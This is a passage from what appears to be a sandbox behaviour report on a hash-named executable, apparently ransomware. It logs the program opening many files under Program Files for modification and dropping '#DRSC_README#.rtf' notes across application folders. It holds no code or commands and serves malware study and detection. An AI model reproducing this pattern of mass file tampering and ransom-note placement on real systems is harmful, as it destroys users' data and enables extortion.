9.0\Reader\Tracker\reviews_super.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Rome 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\A3DUtility.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Pago_Pago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Thunder_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jcmd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Denver 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Stanley 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\MSBuild\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-5 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-common.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.oracle.jmc.executable.win32.win32.x86_64_5.5.0 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hu.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jmx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Oslo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\New_Salem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Vostok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Istanbul 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-12 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Maputo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\th.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoCanary.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-13 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tashkent 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RegisterJoin.pub 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Winamac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox_1.0.500.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Thunder_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\platform.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Samarkand 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Davis 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands_0.10.2.v20140424-2344.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 